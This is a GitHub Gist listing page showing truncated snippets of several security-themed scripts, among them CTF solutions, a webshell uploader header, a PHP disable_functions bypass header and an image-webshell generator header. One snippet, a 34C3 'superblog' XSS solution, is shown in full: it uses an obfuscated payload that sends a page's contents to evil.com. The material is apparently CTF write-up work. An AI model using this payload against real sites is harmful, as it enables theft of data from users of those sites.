Skip to content

Instantly share code, notes, and snippets.

View WangYihang's full-sized avatar
🎯
Focusing

Yihang Wang WangYihang

🎯
Focusing
1.9k followers · 83 following
View GitHub Profile
@neargle
neargle / httplogger.py
Last active August 21, 2020 10:59
该脚本会在80端口开启一个服务并记录所有访问到该服务的HTTP请求,返回访问时间并将请求包转化为Burpsuite等工具可用的格式记录在日志里。依赖Flask(pip install Flask),使用: python httplogger.py log.log
# coding=utf-8
# [email protected]
import os
import logging
import datetime
import string
from sys import argv
from flask import Flask, request
@badbye
badbye / check_email.py
Last active July 8, 2020 09:32
Check the validation of an email
# encoding: utf8
"""
Created on 2017.06.27
@author: yalei
Reference:
1. http://www.ruanyifeng.com/blog/2017/06/smtp-protocol.html
2. http://blog.online-domain-tools.com/2014/11/14/how-to-verify-email-address/
@WangYihang
WangYihang / base64-encoded-webshell.py
Last active November 29, 2021 08:55
#!/usr/bin/env python
# encoding:utf-8
# Author : WangYihang
# Date : 2017/10/03
# Email : [email protected]
# Comment : to solve XDCTF-2017-WEB-Upload
import string
import itertools
import os
@WangYihang
WangYihang / simple-port-multiplier.py
Created October 19, 2017 17:45
A Simple Port Multiplier.py
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# a Tcp Port Forwarding and a Port Multiplier (HTTP/SSH)
# Author : WangYihang <[email protected]>
import socket
import threading
import sys
@WangYihang
WangYihang / HITCON-2017-WEB-BabyFirstRevenge.py
Created November 6, 2017 04:12
Exploit for HITCON-2017-WEB-BabyFirstRevenge
#!/usr/bin/env python
# encoding:utf-8
# Author : WangYihang
# Email : [email protected]
# To solve HITCON-2017-WEB-BabyFirstRevenge
import requests
import hashlib
def get_global_ip():
anonymous
anonymous / csim.c
Created December 11, 2017 13:31
/*
* Harbin Institute of Technology 1603002 1150810613 Qiuhao Li
*
* Anyone can modify this code and then redistribute it to help others.
*
* -std=c99
*/
#include "cachelab.h"
#include <stdio.h> /* fopen freopen perror */
@cgvwzq
cgvwzq / solution.html
Created December 30, 2017 11:45
34c3 - superblog
XSS vector:
<link id=foo rel=import href=/flag(1|2)>
<script src="/feed?type=jsonp&cb=payload"></script>
<!-- superblog 1 - flag: 34C3_so_y0u_w3nt_4nd_learned_SOME_javascript_g00d_f0r_y0u -->
<script>
document.write`${Array.call`${atob`PA`}${`l`}${`i`}${`n`}${`k`}${atob`IA`}${`r`}${`e`}${`l`}${atob`PQ`}${atob`Ig`}${`p`}${`r`}${`e`}${`f`}${`e`}${`t`}${`c`}${`h`}${atob`Ig`}${atob`IA`}${`h`}${`r`}${`e`}${`f`}${atob`PQ`}${atob`Ig`}${`h`}${`t`}${`t`}${`p`}${atob`Og`}${atob`Lw`}${atob`Lw`}${`evil`}${atob`Lg`}${`com`}${atob`Og`}${atob`Lw`}${Math.random``}${`_`}${escape.call`${document.getElementsByTagName`link`.item``.import.body.innerText}`}${atob`Ig`}${atob`Pg`}`.join``}`,
</script>
<!-- superblog 2 - flag: 34C3_h3ncef0rth_peopl3_sh4ll_refer_t0_y0u_only_4s_th3_ES6+DOM_guru -->
@verctor
verctor / procfs_bypass.php
Last active January 29, 2019 09:59
procfs_bypass fixed
<?php
/*
$libc_ver:
beched@linuxoid ~ $ php -r 'readfile("/proc/self/maps");' | grep libc
7f3dfa609000-7f3dfa7c4000 r-xp 00000000 08:01 9831386 /lib/x86_64-linux-gnu/libc-2.19.so
$open_php:
@WangYihang
WangYihang / GSoC-2018-Works-On-Metasploit-Project.md
Last active August 22, 2018 03:28
@mozhu1024
mozhu1024 / php_images_webshell_jpg.php
Created September 27, 2018 13:39
[PHP Image Webshell] A script to generate php webshell in image #php #image #img #webshell
<?php
/*
The algorithm of injecting the payload into the JPG image, which will keep unchanged after transformations
caused by PHP functions imagecopyresized() and imagecopyresampled().
It is necessary that the size and quality of the initial image are the same as those of the processed
image.
1) Upload an arbitrary image via secured files upload script
2) Save the processed image and launch: